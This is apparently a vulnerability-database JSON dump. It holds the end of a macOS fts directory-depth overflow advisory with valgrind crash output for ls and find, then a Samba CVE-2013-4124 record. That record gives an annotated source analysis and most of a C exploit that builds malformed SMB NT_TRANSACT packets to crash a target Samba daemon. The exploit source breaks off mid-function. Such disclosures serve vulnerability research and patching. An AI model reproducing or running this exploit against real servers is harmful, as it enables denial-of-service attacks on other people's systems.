\n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/ \nB/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \n==1009== Invalid read of size 1 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd \n==1009== \n==1009== \n==1009== Process terminating with default action of signal 11 (SIGSEGV) \n==1009== Access not within mapped region at address 0x102D20318 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== If you believe this happened as a result of a stack \n==1009== overflow in your program's main thread (unlikely but \n==1009== possible), you can try to increase the size of the \n==1009== main thread stack using the --main-stacksize= flag. \n==1009== The main thread stack size used in this run was 8388608. \n==1009== \n==1009== HEAP SUMMARY: \n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks \n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated \n==1009== \n==1009== LEAK SUMMARY: \n==1009== definitely lost: 519 bytes in 6 blocks \n==1009== indirectly lost: 104 bytes in 6 blocks \n==1009== possibly lost: 0 bytes in 0 blocks \n==1009== still reachable: 1,645,151 bytes in 5,819 blocks \n==1009== suppressed: 26,225 bytes in 194 blocks \n==1009== Rerun with --leak-check=full to see details of leaked memory \n==1009== \n==1009== For counts of detected and suppressed errors, rerun with: -v \n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) \nSegmentation fault: 11 \nMacMini:SCANME cxsecurity$ \n \n \nIt looks like a buffer overflow in memmove(). Code \n \nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c \n \n \nThe same issue for 'find' which may be used in cron scripts like \n \n \n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print \n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print \n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; \n \n \nLet's see valgrind output. \n \n \nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\" \n==1055== Memcheck, a memory error detector \n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. \n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info \n==1055== Command: find . -name R \n==1055== \nfind: ./.Trashes: Permission denied \n==1055== Invalid write of size 2 \n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd \n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n.. \n \nInvalid memory write without crashing. \n \n \nBTW: \nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. \n \n====== References =================================== \nhttps://cxsecurity.com/issue/WLB-2014040027 \nhttps://cxsecurity.com/cveshow/CVE-2014-4433/ \nhttps://cxsecurity.com/cveshow/CVE-2014-4434/ \nhttps://cxsecurity.com/issue/WLB-2013110059 \nhttps://cxsecurity.com/cveshow/CVE-2013-6799/ \nhttps://cxsecurity.com/issue/WLB-2010040284 \nhttps://cxsecurity.com/cveshow/CVE-2010-0105/ \nhttps://cxsecurity.com/issue/WLB-2005090063 \n \n \n====== Thanks =================================== \nKacper and Smash_ from DEVILTEAM for technical support. \n \n \n====== Credit =================================== \nMaksymilian Arciemowicz from cxsecurity.com \n \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \nhttp://cifrex.org/ \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/134090/macosxfts-overflow.txt"}], "seebug": [{"lastseen": "2017-11-19T16:52:21", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-81370", "id": "SSV:81370", "title": "Samba nttrans Reply - Integer Overflow Vulnerability", "type": "seebug", "sourceData": "\n Exploitation: samba nttrans reply integer overflow\r\n\r\n ___ ___ \r\n / _ \\ / _ \\ \r\n __ __| (_) || | | | ___ \r\n \\ \\/ / \\__. || | | | / __| \r\n > < / / | |_| || (__ \r\n /_/\\_\\ /_/ \\___/ \\___|\r\n\r\n\r\nCVE-2013-4124 samba integer overflow in nttrans \r\nreply reading ea_list\r\n\r\nvulnerable samba daemon has a integer overflow \r\nto cause remote dos by nttrans reply while the \r\ndaemon reading ea_list. In the detail, unsigned\r\ndata type offset variable in vulnerable function \r\nof read_nttrans_ea_list can be wrap up! security\r\nbug! \r\n\r\n\r\nx90c\r\n\r\n[vulnerable versions]\r\n - samba 3.5.22 <=\r\n - samba 3.6.17 <=\r\n - samba 4.0.8 <=\r\n\r\n[call graph]\r\n+reply_nttrans\t// reply nttrans\r\n +->handle_nttrans\r\n +-> call_nt_transact_create\t// transact!\r\n -> read_nttrns_ea_list(vulnerable function)\r\n\r\n[security bug analyze]\r\nsmbd/nttrans.c\r\n---- snip ---- snip ---- snip ---- snip ----\r\n971 /****************************************************************************\r\n 972 Read a list of EA names and data from an incoming data buffer. Create an ea_list with them.\r\n 973 ****************************************************************************/\r\n 974 EA names, data from samba incoming buffer!\r\n 975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata, size_t data_size)\t// *pdata is inject vector\r\n 976 {\r\n 977 struct ea_list *ea_list_head = NULL;\r\n 978 size_t offset = 0;\t// unisigned\r\n 979 \r\n 980 if (data_size < 4) {\r\n 981 return NULL;\r\n 982 }\r\n 983 \r\n 984 while (offset + 4 <= data_size) {\t// XXX (3) if offset is wrap up then it enters the loop continuly\r\n 985 size_t next_offset = IVAL(pdata,offset);\t// unsigned XXX (1) if next_offset from pdata pointer is much large value then to lead integer wrap!\r\n// XXX (4) may memory corruption point! if offset is wrap up then second argv pointer(pdata+offset+4) pointers around zero memory then smb dos! \r\n 986 struct ea_list *eal = read_ea_list_entry(ctx, pdata + offset + 4, data_size - offset - 4, NULL);\r\n 987 \r\n 988 if (!eal) {\r\n 989 return NULL;\r\n 990 }\r\n 991 \r\n 992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *);\r\n 993 if (next_offset == 0) {\r\n 994 break;\r\n 995 }\r\n 996 \r\n 997 /* Integer wrap protection for the increment. */\t\t// XXX patch code\r\n 998 if (offset + next_offset < offset) {\r\n 999 break;\r\n1000 }\r\n1001 \r\n1002 offset += next_offset;\t// XXX (2) if next_offset is large value then offset is wrap!\r\n1003 \r\n1004 /* Integer wrap protection for while loop. */\t// XXX patch code\r\n1005 if (offset + 4 < offset) {\r\n1006 break;\r\n1007 }\r\n1008 \r\n1009 }\r\n1010 \r\n1011 return ea_list_head;\r\n1012 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n---- snip ---- snip ---- snip ---- snip ----\r\n1014 /****************************************************************************\r\n1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's).\r\n1016 ****************************************************************************/\r\n1017 \r\n1018 static void call_nt_transact_create(connection_struct *conn,\r\n1019 struct smb_request *req,\r\n1020 uint16 **ppsetup, uint32 setup_count,\r\n1021 char **ppparams, uint32 parameter_count,\r\n1022 char **ppdata, uint32 data_count,\r\n1023 uint32 max_data_count)\r\n1024 {\r\n...\r\n1148 /* We have already checked that ea_len <= data_count here. */\r\n1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len,\r\n1150 ea_len);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n---- snip ---- snip ---- snip ---- snip ----\r\n2639 static void handle_nttrans(connection_struct *conn,\r\n2640 struct trans_state *state,\r\n2641 struct smb_request *req)\r\n2642 {\r\n...\r\n2651 /* Now we must call the relevant NT_TRANS function */\r\n2652 switch(state->call) {\r\n2653 case NT_TRANSACT_CREATE:\t// NT_TRANSACT_CREATE!\r\n2654 {\r\n2655 START_PROFILE(NT_transact_create);\r\n2656 call_nt_transact_create(\r\n2657 conn, req,\r\n2658 &state->setup, state->setup_count,\r\n2659 &state->param, state->total_param,\r\n2660 &state->data, state->total_data,\r\n2661 state->max_data_return);\r\n2662 END_PROFILE(NT_transact_create);\r\n2663 break;\r\n2664 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n---- snip ---- snip ---- snip ---- snip ----\r\n2770 /****************************************************************************\r\n2771 Reply to a SMBNTtrans.\r\n2772 ****************************************************************************/\r\n2773 \r\n2774 void reply_nttrans(struct smb_request *req)\t// smb_request!\r\n2775 {\r\n...\r\n2945 if ((state->received_data == state->total_data) &&\r\n2946 (state->received_param == state->total_param)) {\r\n2947 handle_nttrans(conn, state, req);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n[exploitability]\r\n\r\n * keywords:\r\n - samba incoming data\r\n - EA names\r\n - data\r\n - 0xf1000000\r\n - SMB NTTRANS\r\n - Samba reply_nttrans() Remote Root Exploit\r\n (http://www.securiteam.com/exploits/5TP0M2AAKS.html)\r\n - SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field)\r\n - SMBtrans\r\n - http://ubiqx.org/cifs/SMB.html\r\n\r\n\r\nThe security bug is remote dos to a daemon, the \r\nimpact is exist even though it's exploited on \r\nlocal network. If large local network exist and \r\nmany samba on the network, security risk is exist. \r\nI assign the dos impact to medium, and the apache \r\nor wuftpd dos to high because they are can be \r\nexploited on internet\r\n\r\n/*\r\n\r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n\r\n CVE-2013-4124 samba remote dos private exploit\r\n\r\n \r\n ./samba_nttrans_exploit [target ip addr]\r\n\r\n * ... test ...:\r\n I didn't test for the exploit, I \r\n copied another samba nttrans exploit \r\n in 2003 that http://www.securiteam.co\r\n m/exploits/5TP0M2AAKS.html. It should \r\n be works!\r\n \r\n the exploit send malformed nttrans \r\n smb packet with large value of data \r\n offset to cause integer wrap in the \r\n vulnerable function of read_nttrns_ea_list\r\n\r\n I left an article that analyzed it\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n\r\n\r\n x90c\r\n\r\n*/\r\n\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include <signal.h>\r\n\r\ntypedef unsigned char uint8;\r\ntypedef unsigned short uint16;\r\ntypedef unsigned long uint32;\r\n\r\nstruct variable_data_header\r\n{ uint8 wordcount, bytecount[2];\r\n};\r\n\r\nstruct nbt_session_header\r\n{ uint8 type, flags, len[2];\r\n};\r\n\r\nstruct smb_base_header\r\n{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];\r\n uint8 flags;\r\n uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];\r\n};\r\n\r\nstruct negprot_reply_header\r\n{ uint8 wordcount;\r\n uint8 dialectindex[2];\r\n uint8 securitymode;\r\n uint16 maxmpxcount, maxvccount;\r\n uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow, timehigh;\r\n uint16 timezone;\r\n uint8 keylen;\r\n uint16 bytecount;\r\n};\r\n\r\nstruct sesssetupx_request_header\r\n{ uint8 wordcount, command, reserved;\r\n uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];\r\n uint8 sessionid[4];\r\n uint8 ipasswdlen[2], passwdlen[2];\r\n uint8 reserved2[4], capabilities[4];\r\n};\r\n\r\nstruct sesssetupx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2], bytecount[2];\r\n};\r\n\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n};\r\n\r\nstruct tconx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2], bytecount[2];\r\n};\r\n\r\nstruct nttrans_primary_request_header\r\n{ \r\n uint8 wordcount; \r\n uint8 maxsetupcount; \r\n uint8 flags[2];\r\n uint8 totalparamcount[4]; \r\n uint8 totaldatacount[4];\r\n uint8 maxparamcount[4];\r\n uint8 maxdatacount[4];\r\n uint8 paramcount[4];\r\n uint8 paramoffset[4];\r\n uint8 datacount[4];\r\n uint8 dataoffset[4]; // XXXX 0xf000000\r\n uint8 setupcount; \r\n uint8 function[2]; \r\n uint8 bytecount[2];\r\n};\r\n\r\n#define SMB_NEGPROT 0x72\r\n#define SMB_SESSSETUPX 0x73\r\n#define SMB_TCONX 0x75\r\n#define SMB_TRANS2 0x32\r\n#define SMB_NTTRANS 0xA0\r\n#define SMB_NTTRANSCREATE 0x01\r\n#define SMB_TRANS2OPEN 0x00\r\n#define SMB_SESSIONREQ 0x81\r\n#define SMB_SESSION 0x00\r\n\r\nuint32 sessionid, PARAMBASE = 0x81c0000;\r\nchar *tconx_servername;\r\nint tid, pid, uid;\r\n\r\n#define STACKBOTTOM 0xbfffffff\r\n#define STACKBASE 0xbfffd000\r\n#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))\r\n\r\nchar *netbios_encode_name(char *name, int type)\r\n{ char plainname[16], c, *encoded, *ptr;\r\n int i, len = strlen(name);\r\n if ((encoded = malloc(34)) == NULL)\r\n { fprintf(stderr, "malloc() failed\\n");\r\n exit(-1);\r\n }\r\n ptr = encoded;\r\n strncpy(plainname, name, 15);\r\n *ptr++ = 0x20;\r\n for (i = 0; i < 16; i++)\r\n { if (i == 15) c = type;\r\n else \r\n { if (i < len) c = toupper(plainname[i]);\r\n else c = 0x20;\r\n }\r\n *ptr++ = (((c >> 4) & 0xf) + 0x41);\r\n *ptr++ = ((c & 0xf) + 0x41);\r\n }\r\n *ptr = '\\0';\r\n return encoded;\r\n}\r\n\r\nvoid construct_nbt_session_header(char *ptr, uint8 type, uint8 flags, uint32 len)\r\n{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;\r\n uint16 nlen;\r\n\r\n// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..\r\n if (len > 65535) nlen = 65535;\r\n else nlen = htons(len);\r\n\r\n memset((void *)nbt_hdr, '\\0', sizeof (struct nbt_session_header));\r\n \r\n nbt_hdr->type = type;\r\n nbt_hdr->flags = flags;\r\n memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));\r\n}\r\n\r\n// caller zorgt voor juiste waarde van ptr.\r\nvoid construct_smb_base_header(char *ptr, uint8 command, uint8 flags, uint16 flags2, uint16 tid, uint16 pid, \r\n uint16 uid, uint16 mid)\r\n{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;\r\n\r\n memset(base_hdr, '\\0', sizeof (struct smb_base_header));\r\n\r\n memcpy(base_hdr->protocol, "\\xffSMB", 4);\r\n\r\n base_hdr->command = command;\r\n base_hdr->flags = flags;\r\n\r\n memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));\r\n memcpy(&base_hdr->tid, &tid, sizeof (uint16));\r\n memcpy(&base_hdr->pid, &pid, sizeof (uint16));\r\n memcpy(&base_hdr->uid, &uid, sizeof (uint16));\r\n memcpy(base_hdr->mid, &mid, sizeof (uint16));\r\n}\r\n\r\nvoid construct_sesssetupx_header(char *ptr)\r\n{ struct sesssetupx_request_header *sx_hdr = (struct sesssetupx_request_header *)ptr;\r\n uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen = 0;\r\n uint32 capabilities = 0x50;\r\n\r\n memset(sx_hdr, '\\0', sizeof (struct sesssetupx_request_header));\r\n\r\n sx_hdr->wordcount = 13;\r\n sx_hdr->command = 0xff;\r\n memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));\r\n memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));\r\n memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));\r\n memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));\r\n memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));\r\n}\r\n\r\n/*\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2], passwdlen[2], bytecount[2];\r\n -- uint16 bytecount geeft lengte van volgende fields aan: char password[], path[], service[];\r\n}; */\r\nvoid construct_tconx_header(char *ptr)\r\n{ struct tconx_request_header *tx_hdr = (struct tconx_request_header *)ptr;\r\n uint16 passwdlen = 1, bytecount;\r\n char *data;\r\n\r\n memset(tx_hdr, '\\0', sizeof (struct tconx_request_header));\r\n\r\n bytecount = strlen(tconx_servername) + 15; \r\n\r\n if ((data = malloc(bytecount)) == NULL)\r\n { fprintf(stderr, "malloc() failed, aborting!\\n");\r\n exit(-1);\r\n }\r\n memcpy(data, "\\x00\\x5c\\x5c", 3);\r\n memcpy(data + 3, tconx_servername, strlen(tconx_servername));\r\n memcpy(data + 3 + strlen(tconx_servername), "\\x5cIPC\\x24\\x00\\x3f\\x3f\\x3f\\x3f\\x3f\\x00", 12);\r\n\r\n tx_hdr->wordcount = 4;\r\n tx_hdr->xcommand = 0xff;\r\n\r\n memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));\r\n memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));\r\n\r\n memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);\r\n}\r\n\r\nvoid nbt_session_request(int fd, char *clientname, char *servername)\r\n{ \r\n char *cn, *sn;\r\n char packet[sizeof (struct nbt_session_header) + (34 * 2)];\r\n\r\n construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n\r\n tconx_servername = servername;\r\n\r\n sn = netbios_encode_name(servername, 0x20);\r\n cn = netbios_encode_name(clientname, 0x00);\r\n\r\n memcpy(packet + sizeof (struct nbt_session_header), sn, 34);\r\n memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);\r\n\r\n write(fd, packet, sizeof (packet));\r\n close(fd);\r\n\r\n free(cn);\r\n free(sn);\r\n}\r\n\r\nvoid process_nbt_session_reply(int fd)\r\n{ struct nbt_session_header nbt_hdr;\r\n char *errormsg;\r\n uint8 errorcode;\r\n int size, len = 0;\r\n\r\n if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)\r\n { close(fd);\r\n fprintf(stderr, "read() failed, reason: '%s' (code %i)\\n", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (nbt_hdr))\r\n { close(fd);\r\n fprintf(stderr, "read() a broken packet, aborting.\\n"); \r\n exit(-1);\r\n }\r\n memcpy(&len, &nbt_hdr.len, sizeof (uint16));\r\n\r\n if (len)\r\n { read(fd, (void *)&errorcode, 1); \r\n close(fd);\r\n switch (errorcode)\r\n { case 0x80 : errormsg = "Not listening on called name"; break;\r\n case 0x81 : errormsg = "Not listening for calling name"; break;\r\n case 0x82 : errormsg = "Called name not present"; break;\r\n case 0x83 : errormsg = "Called name present, but insufficient resources"; break;\r\n case 0x8f : errormsg = "Unspecified error"; break;\r\n default : errormsg = "Unspecified error (unknown error code received!)"; break;\r\n }\r\n fprintf(stderr, "session request denied, reason: '%s' (code %i)\\n", errormsg, errorcode);\r\n exit(-1);\r\n }\r\n printf("session request granted\\n");\r\n}\r\n\r\nvoid negprot_request(int fd)\r\n{ struct variable_data_header data;\r\n char dialects[] = "\\x2PC NETWORK PROGRAM 1.0\\x0\\x2MICROSOFT NETWORKS 1.03\\x0\\x2MICROSOFT NETWORKS 3.0\\x0\\x2LANMAN1.0\\x0" \\\r\n "\\x2LM1.2X002\\x0\\x2Samba\\x0\\x2NT LANMAN 1.0\\x0\\x2NT LM 0.12\\x0\\x2""FLATLINE'S KWAADWAAR"; \r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data) + sizeof (dialects)];\r\n int dlen = htons(sizeof (dialects));\r\n\r\n memset(&data, '\\0', sizeof (data));\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n pid = getpid();\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_NEGPROT, 8, 1, 0, pid, 0, 1);\r\n\r\n memcpy(&data.bytecount, &dlen, sizeof (uint16));\r\n\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header)), &data, sizeof (data));\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + sizeof (data)), \r\n dialects, sizeof (dialects));\r\n\r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, "write() failed, reason: '%s' (code %i)\\n", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n}\r\n\r\nvoid process_negprot_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct negprot_reply_header *np_reply_hdr;\r\n char packet[1024];\r\n int size;\r\n uint16 pid_reply;\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct nbt_session_header) + \r\n sizeof (struct smb_base_header)));\r\n\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, "read() failed, reason: '%s' (code %i)\\n", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n\r\n memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));\r\n memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));\r\n if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 || pid_reply != pid)\r\n { close(fd);\r\n fprintf(stderr, "protocol negotiation failed\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("protocol negotiation complete\\n");\r\n}\r\n\r\nvoid sesssetupx_request(int fd)\r\n{ uint8 data[] = "\\x12\\x0\\x0\\x0\\x55\\x6e\\x69\\x78\\x00\\x53\\x61\\x6d\\x62\\x61";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header) + sizeof (data)];\r\n int size;\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) - sizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header), SMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);\r\n construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header) + \r\n sizeof (struct sesssetupx_request_header), &data, sizeof (data));\r\n\r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, "write() failed, reason: '%s' (code %i)\\n", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, "couldn't write entire packet, aborting!\\n");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid process_sesssetupx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct sesssetupx_reply_header *sx_hdr;\r\n char packet[1024];\r\n int size, len;\r\n\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, "read() failed, reason: '%s' (code %i)\\n", strerror(errno), errno); \r\n exit(-errno);\r\n }\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct nbt_session_header));\r\n sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct nbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n memcpy(&len, &nbt_hdr->len, sizeof (uint16));\r\n memcpy(&uid, &base_hdr->uid, sizeof (uint16));\r\n\r\n if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)\r\n { close(fd);\r\n fprintf(stderr, "session setup failed\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("session setup complete, got assigned uid %i\\n", uid);\r\n}\r\n\r\nvoid tconx_request(int fd)\r\n{ \r\n char *packet;\r\n int size, pktsize = sizeof (struct nbt_session_header) + 